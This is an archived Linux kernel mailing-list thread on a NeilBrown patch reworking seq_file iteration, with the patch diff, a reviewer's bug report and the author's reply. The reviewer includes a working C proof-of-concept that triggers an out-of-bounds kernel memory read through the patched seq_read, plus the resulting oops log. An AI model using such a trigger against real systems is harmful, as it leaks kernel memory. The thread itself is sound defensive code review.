Message ID | 87y3fcegnn.fsf@notabene.neil.brown.name (mailing list archive) |
---|---|
State | New, archived |
Headers | show |
On Sat, Jul 7, 2018 at 2:11 AM NeilBrown <neilb@suse.com> wrote: > > > The documentation for seq_file suggests that it is necessary to be > able to move the iterator to a given offset, however that is not the > case. If the iterator is stored in the private data and is stable > from one read() syscall to the next, it is only necessary to support > first/next interactions. Implementing this in a client is a little > clumsy. > - if ->start() is given a pos of zero, it should go to start of > sequence. > - if ->start() is given the name pos that was given to the most recent > next() or start(), it should restore the iterator to state just > before that last call > - if ->start is given another number, it should set the iterator one > beyond the start just before the last ->start or ->next call. > > > Also, the documentation says that the implementation can interpret the > pos however it likes (other than zero meaning start), but seq_file > increments the pos sometimes which does impose on the implementation. > > This patch simplifies the interface for first/next iteration and > simplifies the code, while maintaining complete backward > compatability. Now: > > - if ->start() is given a pos of zero, it should return an iterator > placed at the start of the sequence > - if ->start() is given a non-zero pos, it should return the iterator > in the same state it was after the last ->start or ->next. > > This is particularly useful for interators which walk the multiple > chains in a hash table, e.g. using rhashtable_walk*. See > fs/gfs2/glock.c and drivers/staging/lustre/lustre/llite/vvp_dev.c > > A large part of achieving this is to *always* call ->next after ->show > has successfully stored all of an entry in the buffer. Never just > increment the index instead. > Also: > - always pass &m->index to ->start() and ->next(), never a temp > variable > - don't clear ->from when ->count is zero, as ->from is dead when > ->count is zero. > > > Some ->next functions do not increment *pos when they return NULL. > To maintain compatability with this, we still need to increment > m->index in one place, if ->next didn't increment it. > Note that such ->next functions are buggy and should be fixed. > A simple demonstration is > dd if=/proc/swaps bs=1000 skip=1 > Choose any block size larger than the size of /proc/swaps. > This will always show the whole last line of /proc/swaps. > > This patch doesn't work around buggy next() functions for this case. > > Acked-by: Jonathan Corbet <corbet@lwn.net> (For the docs part) > Signed-off-by: NeilBrown <neilb@suse.com> > --- > > Still hoping someone might apply this, or at least review it, > or maybe just tell me how insane it is - anything but silence :-( > > NeilBrown [...] > diff --git a/fs/seq_file.c b/fs/seq_file.c > index 4cc090b50cc5..fd82585ab50f 100644 > --- a/fs/seq_file.c > +++ b/fs/seq_file.c [...] > @@ -160,7 +154,6 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) > { > struct seq_file *m = file->private_data; > size_t copied = 0; > - loff_t pos; > size_t n; > void *p; > int err = 0; > @@ -223,16 +216,11 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) > size -= n; > buf += n; > copied += n; > - if (!m->count) { > - m->from = 0; > - m->index++; > - } > if (!size) > goto Done; > } > /* we need at least one record in buffer */ > - pos = m->index; > - p = m->op->start(m, &pos); > + p = m->op->start(m, &m->index); > while (1) { > err = PTR_ERR(p); > if (!p || IS_ERR(p)) > @@ -243,8 +231,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) > if (unlikely(err)) > m->count = 0; > if (unlikely(!m->count)) { > - p = m->op->next(m, p, &pos); > - m->index = pos; > + p = m->op->next(m, p, &m->index); > continue; > } > if (m->count < m->size) > @@ -256,29 +243,33 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) > if (!m->buf) > goto Enomem; > m->version = 0; > - pos = m->index; > - p = m->op->start(m, &pos); > + p = m->op->start(m, &m->index); > } > m->op->stop(m, p); > m->count = 0; > goto Done; > Fill: > /* they want more? let's try to get some more */ > - while (m->count < size) { > + while (1) { > size_t offs = m->count; > - loff_t next = pos; > - p = m->op->next(m, p, &next); > + loff_t pos = m->index; > + > + p = m->op->next(m, p, &m->index); > + if (pos == m->index) > + /* Buggy ->next function */ > + m->index++; > if (!p || IS_ERR(p)) { > err = PTR_ERR(p); > break; > } > + if (m->count >= size) > + break; > err = m->op->show(m, p); > if (seq_has_overflowed(m) || err) { > m->count = offs; > if (likely(err <= 0)) > break; > } > - pos = next; > } > m->op->stop(m, p); > n = min(m->count, size); > @@ -287,11 +278,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) > goto Efault; > copied += n; > m->count -= n; > - if (m->count) > - m->from = n; > - else > - pos++; > - m->index = pos; > + m->from = n; This patch introduces a kernel memory disclosure bug when something like the following sequence of events happens (starting from a freshly opened seq file): 1. read(seq_fd, buf, 2000): sets m->from=2000, m->count=100 2. create a buffer broken_buf which consists of 1000 bytes writable memory followed by unmapped memory 3. read(seq_fd, broken_buf, 3100): - flushes buffered data to userspace, result: m->from=2100, m->count=0 - accumulates new data, result: m->from=2100, m->count=3050 - tries to copy new data to userspace, but fails ("goto Efault") 4. read(seq_fd, buf, 4096): does copy_to_user(buf, m->buf + m->from, n) I wrote the following crasher to test this: ================== #include <sys/mman.h> #include <err.h> #include <errno.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <stdio.h> int main(void) { // dummy mappings: make sure /proc/self/smaps has lots to say for (int i=0; i<50; i++) { void *mapping = mmap(NULL, 0x2000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (mapping == MAP_FAILED) err(1, "mmap"); if (mprotect(mapping, 0x1000, PROT_NONE)) err(1, "mprotect"); } int fd = open("/proc/self/smaps", O_RDONLY); if (fd == -1) err(1, "open"); char buf[0x1000]; // set m->from = 2000, m->count ~= 100 int first_res = read(fd, buf, 2000); if (first_res != 2000) errx(1, "first res"); // broken_buf: 1000 bytes writable memory followed by unmapped memory char *broken_buf_base = mmap(NULL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (broken_buf_base == MAP_FAILED) err(1, "mmap"); if (mprotect(broken_buf_base+0x1000, 0x1000, PROT_NONE)) err(1, "mprotect"); char *broken_buf = broken_buf_base+0x1000-1000; // set m->from = 2000, m->count ~= 3050 int second_res = read(fd, broken_buf, 3100); printf("second read: %d\n", second_res); if (second_res <= 0 || second_res > 1000) errx(1, "second read didn't partly succeed as expected"); // trigger OOB read read(fd, buf, 0x1000); } ================== Running this against a linux-next build with CONFIG_HARDENED_USERCOPY=y, I reliably get kernel oopses that look as follows: ================== [ 240.215442] usercopy: Kernel memory exposure attempt detected from SLAB object 'kmalloc-4096' (offset 2663, size 2613)! [ 240.215475] ------------[ cut here ]------------ [ 240.215478] kernel BUG at mm/usercopy.c:100! [ 240.215491] invalid opcode: 0000 [#1] SMP KASAN PTI [ 240.215500] CPU: 1 PID: 968 Comm: seq_read_trigge Not tainted 4.18.0-rc3-next-20180706 #37 [ 240.215506] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 240.215540] RIP: 0010:usercopy_abort+0x69/0x80 [ 240.215544] Code: 44 d0 53 48 c7 c0 60 98 ae 92 51 48 c7 c6 e0 97 ae 92 41 53 48 89 f9 48 0f 45 f0 4c 89 d2 48 c7 c7 80 99 ae 92 e8 e0 2d dc ff <0f> 0b 49 c7 c1 20 97 ae 92 4d 89 cb 4d 89 c8 eb a5 66 0f 1f 44 00 [ 240.215615] RSP: 0018:ffff8801d0a47bf8 EFLAGS: 00010286 [ 240.215621] RAX: 000000000000006b RBX: 0000000000000a35 RCX: ffffffff911c883e [ 240.215627] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff8801ec3261cc [ 240.215632] RBP: ffffea00079e2800 R08: ffffed003d864f29 R09: ffffed003d864f29 [ 240.215637] R10: ffffffff92ae9820 R11: ffffed003d864f28 R12: 0000000000000a35 [ 240.215643] R13: 0000000000000001 R14: ffff8801e78a1ddc R15: ffffea00079e2800 [ 240.215649] FS: 00007f820d397700(0000) GS:ffff8801ec300000(0000) knlGS:0000000000000000 [ 240.215655] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 240.215660] CR2: 00007f820cf4f4c4 CR3: 00000001e7868003 CR4: 00000000001606e0 [ 240.215668] Call Trace: [ 240.215680] __check_heap_object+0xb3/0xc0 [ 240.215691] __check_object_size+0xdc/0x240 [ 240.215702] ? check_stack_object+0x21/0x60 [ 240.215722] seq_read+0x3d8/0x6a0 [ 240.215740] ? ldsem_up_read+0x13/0x40 [ 240.215750] __vfs_read+0xc4/0x370 [ 240.215758] ? __x64_sys_copy_file_range+0x2d0/0x2d0 [ 240.215768] ? vma_compute_subtree_gap+0x95/0xc0 [ 240.215775] ? vma_gap_callbacks_rotate+0x37/0x50 [ 240.215785] ? fsnotify+0x895/0x8e0 [ 240.215794] ? fsnotify+0x895/0x8e0 [ 240.215806] ? __fsnotify_inode_delete+0x20/0x20 [ 240.215816] vfs_read+0xa5/0x190 [ 240.215823] ksys_read+0xa1/0x120 [ 240.215830] ? kernel_write+0xa0/0xa0 [ 240.215847] ? mm_fault_error+0x1b0/0x1b0 [ 240.215858] do_syscall_64+0x73/0x160 [ 240.215874] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 240.215881] RIP: 0033:0x7f820cecf700 [ 240.215885] Code: b6 fe ff ff 48 8d 3d 87 be 08 00 48 83 ec 08 e8 06 db 01 00 66 0f 1f 44 00 00 83 3d 49 30 2c 00 00 75 10 b8 00 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 de 9b 01 00 48 89 04 24 [ 240.215955] RSP: 002b:00007ffffbcb56a8 EFLAGS: 00000246 ORIG_RAX: 0000000000000000 [ 240.215962] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f820cecf700 [ 240.215967] RDX: 0000000000001000 RSI: 00007ffffbcb56b0 RDI: 0000000000000003 [ 240.215972] RBP: 00007ffffbcb66e0 R08: 0000000000000001 R09: 0000000000000011 [ 240.215977] R10: 0000000000000064 R11: 0000000000000246 R12: 0000558430e72730 [ 240.215982] R13: 00007ffffbcb67c0 R14: 0000000000000000 R15: 0000000000000000 [ 240.215988] Modules linked in: [ 240.215996] ---[ end trace a76025513bde017a ]--- [ 240.216004] RIP: 0010:usercopy_abort+0x69/0x80 [ 240.216007] Code: 44 d0 53 48 c7 c0 60 98 ae 92 51 48 c7 c6 e0 97 ae 92 41 53 48 89 f9 48 0f 45 f0 4c 89 d2 48 c7 c7 80 99 ae 92 e8 e0 2d dc ff <0f> 0b 49 c7 c1 20 97 ae 92 4d 89 cb 4d 89 c8 eb a5 66 0f 1f 44 00 [ 240.216076] RSP: 0018:ffff8801d0a47bf8 EFLAGS: 00010286 [ 240.216082] RAX: 000000000000006b RBX: 0000000000000a35 RCX: ffffffff911c883e [ 240.216087] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff8801ec3261cc [ 240.216092] RBP: ffffea00079e2800 R08: ffffed003d864f29 R09: ffffed003d864f29 [ 240.216098] R10: ffffffff92ae9820 R11: ffffed003d864f28 R12: 0000000000000a35 [ 240.216103] R13: 0000000000000001 R14: ffff8801e78a1ddc R15: ffffea00079e2800 [ 240.216109] FS: 00007f820d397700(0000) GS:ffff8801ec300000(0000) knlGS:0000000000000000 [ 240.216114] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 240.216119] CR2: 00007f820cf4f4c4 CR3: 00000001e7868003 CR4: 00000000001606e0 ================== (I first started staring at this code because Kees pointed me to https://syzkaller.appspot.com/bug?extid=4b712dce5cbce6700f27 , but I think the case I found doesn't quite match what syzcaller is saying?)
On Sat, Jul 07 2018, Jann Horn wrote: >> @@ -287,11 +278,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) >> goto Efault; >> copied += n; >> m->count -= n; >> - if (m->count) >> - m->from = n; >> - else >> - pos++; >> - m->index = pos; >> + m->from = n; > > This patch introduces a kernel memory disclosure bug when something > like the following sequence of events happens (starting from a freshly > opened seq file): > > 1. read(seq_fd, buf, 2000): sets m->from=2000, m->count=100 > 2. create a buffer broken_buf which consists of 1000 bytes writable > memory followed by unmapped memory > 3. read(seq_fd, broken_buf, 3100): > - flushes buffered data to userspace, result: m->from=2100, m->count=0 > - accumulates new data, result: m->from=2100, m->count=3050 > - tries to copy new data to userspace, but fails ("goto Efault") > 4. read(seq_fd, buf, 4096): does copy_to_user(buf, m->buf + m->from, n) Thanks for testing and for the report. I think I see where I went wrong in the patch. As I said in the description: - don't clear ->from when ->count is zero, as ->from is dead when ->count is zero. It is true that ->from is dead when ->count is zero, but as soon as count becomes non-zero, ->from becomes important again. So we either need to clear ->from whenever ->count is changed from zero (which would be clumsy and error prone) we we need to clear ->from somewhere else. ->count is only increased in ->show() calls and there are three ->show() calls. - in traverse() ->from is set to zero early, and set once more shortly before the function exits, so it is always correct. - in "we need at least one record in buffer" ->count starts at zero so ->from needs to be set to zero as well. - in "Fill:" ->from is still correct from previous setting. So I think we just need m->from = 0; at "we need at least one record in buffer". I'm fairly sure that will fix the problem you found. I would appreciate it if you would test and confirm. I'll send a patch separately. Thanks again, NeilBrown
diff --git a/Documentation/filesystems/seq_file.txt b/Documentation/filesystems/seq_file.txt index 9de4303201e1..d412b236a9d6 100644 --- a/Documentation/filesystems/seq_file.txt +++ b/Documentation/filesystems/seq_file.txt @@ -66,23 +66,39 @@ kernel 3.10. Current versions require the following update The iterator interface -Modules implementing a virtual file with seq_file must implement a simple -iterator object that allows stepping through the data of interest. -Iterators must be able to move to a specific position - like the file they -implement - but the interpretation of that position is up to the iterator -itself. A seq_file implementation that is formatting firewall rules, for -example, could interpret position N as the Nth rule in the chain. -Positioning can thus be done in whatever way makes the most sense for the -generator of the data, which need not be aware of how a position translates -to an offset in the virtual file. The one obvious exception is that a -position of zero should indicate the beginning of the file. +Modules implementing a virtual file with seq_file must implement an +iterator object that allows stepping through the data of interest +during a "session" (roughly one read() system call). If the iterator +is able to move to a specific position - like the file they implement, +though with freedom to map the position number to a sequence location +in whatever way is convenient - the iterator need only exist +transiently during a session. If the iterator cannot easily find a +numerical position but works well with a first/next interface, the +iterator can be stored in the private data area and continue from one +session to the next. + +A seq_file implementation that is formatting firewall rules from a +table, for example, could provide a simple iterator that interprets +position N as the Nth rule in the chain. A seq_file implementation +that presents the content of a, potentially volatile, linked list +might record a pointer into that list, providing that can be done +without risk of the current location being removed. + +Positioning can thus be done in whatever way makes the most sense for +the generator of the data, which need not be aware of how a position +translates to an offset in the virtual file. The one obvious exception +is that a position of zero should indicate the beginning of the file. The /proc/sequence iterator just uses the count of the next number it will output as its position. -Four functions must be implemented to make the iterator work. The first, -called start() takes a position as an argument and returns an iterator -which will start reading at that position. For our simple sequence example, +Four functions must be implemented to make the iterator work. The +first, called start(), starts a session and takes a position as an +argument, returning an iterator which will start reading at that +position. The pos passed to start() will always be either zero, or +the most recent pos used in the previous session. + +For our simple sequence example, the start() function looks like: static void *ct_seq_start(struct seq_file *s, loff_t *pos) @@ -101,11 +117,12 @@ implementations; in most cases the start() function should check for a "past end of file" condition and return NULL if need be. For more complicated applications, the private field of the seq_file -structure can be used. There is also a special value which can be returned -by the start() function called SEQ_START_TOKEN; it can be used if you wish -to instruct your show() function (described below) to print a header at the -top of the output. SEQ_START_TOKEN should only be used if the offset is -zero, however. +structure can be used to hold state from session to session. There is +also a special value which can be returned by the start() function +called SEQ_START_TOKEN; it can be used if you wish to instruct your +show() function (described below) to print a header at the top of the +output. SEQ_START_TOKEN should only be used if the offset is zero, +however. The next function to implement is called, amazingly, next(); its job is to move the iterator forward to the next position in the sequence. The @@ -121,9 +138,13 @@ complete. Here's the example version: return spos; } -The stop() function is called when iteration is complete; its job, of -course, is to clean up. If dynamic memory is allocated for the iterator, -stop() is the place to free it. +The stop() function closes a session; its job, of course, is to clean +up. If dynamic memory is allocated for the iterator, stop() is the +place to free it; if a lock was taken by start(), stop() must release +that lock. The value that *pos was set to by the last next() call +before stop() is remembered, and used for the first start() call of +the next session unless lseek() has been called on the file; in that +case next start() will be asked to start at position zero. static void ct_seq_stop(struct seq_file *s, void *v) { diff --git a/fs/seq_file.c b/fs/seq_file.c index 4cc090b50cc5..fd82585ab50f 100644 --- a/fs/seq_file.c +++ b/fs/seq_file.c @@ -90,23 +90,22 @@ EXPORT_SYMBOL(seq_open); static int traverse(struct seq_file *m, loff_t offset) { - loff_t pos = 0, index; + loff_t pos = 0; int error = 0; void *p; m->version = 0; - index = 0; + m->index = 0; m->count = m->from = 0; - if (!offset) { - m->index = index; + if (!offset) return 0; - } + if (!m->buf) { m->buf = seq_buf_alloc(m->size = PAGE_SIZE); if (!m->buf) return -ENOMEM; } - p = m->op->start(m, &index); + p = m->op->start(m, &m->index); while (p) { error = PTR_ERR(p); if (IS_ERR(p)) @@ -123,20 +122,15 @@ static int traverse(struct seq_file *m, loff_t offset) if (pos + m->count > offset) { m->from = offset - pos; m->count -= m->from; - m->index = index; break; } pos += m->count; m->count = 0; - if (pos == offset) { - index++; - m->index = index; + p = m->op->next(m, p, &m->index); + if (pos == offset) break; - } - p = m->op->next(m, p, &index); } m->op->stop(m, p); - m->index = index; return error; Eoverflow: @@ -160,7 +154,6 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) { struct seq_file *m = file->private_data; size_t copied = 0; - loff_t pos; size_t n; void *p; int err = 0; @@ -223,16 +216,11 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) size -= n; buf += n; copied += n; - if (!m->count) { - m->from = 0; - m->index++; - } if (!size) goto Done; } /* we need at least one record in buffer */ - pos = m->index; - p = m->op->start(m, &pos); + p = m->op->start(m, &m->index); while (1) { err = PTR_ERR(p); if (!p || IS_ERR(p)) @@ -243,8 +231,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) if (unlikely(err)) m->count = 0; if (unlikely(!m->count)) { - p = m->op->next(m, p, &pos); - m->index = pos; + p = m->op->next(m, p, &m->index); continue; } if (m->count < m->size) @@ -256,29 +243,33 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) if (!m->buf) goto Enomem; m->version = 0; - pos = m->index; - p = m->op->start(m, &pos); + p = m->op->start(m, &m->index); } m->op->stop(m, p); m->count = 0; goto Done; Fill: /* they want more? let's try to get some more */ - while (m->count < size) { + while (1) { size_t offs = m->count; - loff_t next = pos; - p = m->op->next(m, p, &next); + loff_t pos = m->index; + + p = m->op->next(m, p, &m->index); + if (pos == m->index) + /* Buggy ->next function */ + m->index++; if (!p || IS_ERR(p)) { err = PTR_ERR(p); break; } + if (m->count >= size) + break; err = m->op->show(m, p); if (seq_has_overflowed(m) || err) { m->count = offs; if (likely(err <= 0)) break; } - pos = next; } m->op->stop(m, p); n = min(m->count, size); @@ -287,11 +278,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) goto Efault; copied += n; m->count -= n; - if (m->count) - m->from = n; - else - pos++; - m->index = pos; + m->from = n; Done: if (!copied) copied = err;